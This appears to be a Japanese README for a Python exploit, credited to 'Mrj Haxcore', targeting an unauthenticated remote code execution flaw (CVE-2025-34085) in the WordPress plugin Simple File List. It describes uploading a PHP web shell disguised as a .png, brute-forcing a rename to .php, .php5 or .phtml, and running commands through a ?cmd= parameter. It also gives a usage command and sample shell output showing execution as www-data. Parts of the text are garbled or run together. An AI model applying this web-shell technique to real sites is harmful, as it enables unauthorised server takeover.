
Simple File List – 認証不要のRCEエクスプロイト (CVE-2025-34085)
⚠️ エクスプロイトコード作成者: Mrj Haxcore
WordPressプラグイン Simple File List (バージョン4.2.3以下) 用の完全に動作するPythonエクスプロイトです。このプラグインは、安全でないファイルアップロードおよびリネームロジックにより、未認証リモートコード実行 (RCE) の脆弱性があります。
simple-file-list).png に見せかけたPHPファイルをアップロードし、.php にリネームして任意のコードを実行できます。multipart/form-data ビルダー (415エラーをバイパス).php, .php5, .phtml 等へのリネームブルートフォース?cmd= によるコマンド実行�PNG ゴミなし)python3 simple.py https://target.site
[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
手動アクセス
https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami